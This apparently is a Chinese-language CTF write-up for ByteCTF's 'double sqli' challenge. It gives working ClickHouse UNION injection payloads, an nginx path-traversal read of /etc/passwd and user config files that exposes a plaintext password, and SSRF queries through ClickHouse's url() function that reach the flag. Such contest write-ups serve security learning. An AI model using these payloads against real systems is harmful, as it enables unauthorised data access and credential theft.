double sqli

easy sqli
http://39.105.175.150:30001/?id=1
http://39.105.116.246:30001/?id=1
http://39.105.189.250:30001/?id=1

打开题目，地址栏有个id参数，测试注入，发现报错信息

http://39.105.189.250:30001/?id=1'

Code: 62. DB::Exception: Syntax error: failed at position 36 ('' '): ' . Single quoted string is not closed: '' '. Stack trace: 0. DB::parseQueryAndMovePosition(DB::IParser&, char const*&, char const*, std::__1::basic_string, std::__1::allocator > const&, bool, unsigned long, unsigned long) @ 0x1184fcb6 in /usr/bin/clickhouse 1. ? @ 0xf12c0ae in /usr/bin/clickhouse 2. DB::executeQuery(std::__1::basic_string, std::__1::allocator > const&, DB::Context&, bool, DB::QueryProcessingStage::Enum, bool) @ 0xf12bce3 in /usr/bin/clickhouse 3. DB::TCPHandler::runImpl() @ 0xf8b7c5d in /usr/bin/clickhouse 4. DB::TCPHandler::run() @ 0xf8ca1c9 in /usr/bin/clickhouse 5. Poco::Net::TCPServerConnection::start() @ 0x11f7ccbf in /usr/bin/clickhouse 6. Poco::Net::TCPServerDispatcher::run() @ 0x11f7e6d1 in /usr/bin/clickhouse 7. Poco::PooledThread::run() @ 0x120b4df9 in /usr/bin/clickhouse 8. Poco::ThreadImpl::runnableEntry(void*) @ 0x120b0c5a in /usr/bin/clickhouse 9. start_thread @ 0x7fa3 in /lib/x86_64-linux-gnu/libpthread-2.28.so 10. clone @ 0xf94cf in /lib/x86_64-linux-gnu/libc-2.28.so

经查询发现是ClickHouse数据库管理系统

https://clickhouse.com/docs/zh/

之前并没有用过这个数据库，所以还是涉及到很多盲区的

联合查询: union all
系统自带表: 
system.tables
	字段：
	database (String) — 表所在的数据库的名称。
	name (String) — 表名。
system.databases

有两个数据库，ctf和default

ctf中有个字段hint

id=1%20union%20all%20select%20*%20from%20ctf.hint

Welcome to ByteCTF',), ('you_dont_have_permissions_to_read_flag

id=2的时候会显示一张图片

http://39.105.189.250:30001/files/test.jpg

nginx配置不当的时候导致的目录穿越

http://39.105.189.250:30001/files../etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
nginx:x:101:102:nginx user,,,:/nonexistent:/bin/false
clickhouse:x:999:999::/nonexistent:/bin/false

users.list，可以看到有两个用户
user_028643c754-c3e5-cbb5-4205-fb5ed51d8493和user_01a84520c1-5143-ecd4-91ac-ec52b34bac85

# a84520c1-5143-ecd4-91ac-ec52b34bac85.sql
ATTACH USER user_01 IDENTIFIED WITH plaintext_password BY 'e3b0c44298fc1c149afb';
ATTACH GRANT SELECT ON ctf.* TO user_01;

可以看到user_01的权限很高

这里有一个点，就是clickhouse有个URL函数，可以通过HTTP客户端进行查询

https://clickhouse.com/docs/zh/interfaces/http/
https://clickhouse.com/docs/zh/sql-reference/table-functions/url/

通过ssrf连接到HTTP客户端，利用上面获取的user的账号和密码进行查询

1 union all select * from url("http://localhost:8123/?user=user_01&password=e3b0c44298fc1c149afb&query=select+name+from+system.tables",CSV,'column String')
=>
1+union+all+select+%2A+from+url%28%22http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2Bname%2Bfrom%2Bsystem.tables%22%2CCSV%2C%27column+String%27%29

1 union all select * from url("http://localhost:8123/?user=user_01&password=e3b0c44298fc1c149afb&query=select+*+from+ctf.flag",CSV,'column String')
=>
1+union+all+select+%2A+from+url%28%22http%3A%2F%2Flocalhost%3A8123%2F%3Fuser%3Duser_01%26password%3De3b0c44298fc1c149afb%26query%3Dselect%2B%2A%2Bfrom%2Bctf.flag%22%2CCSV%2C%27column+String%27%29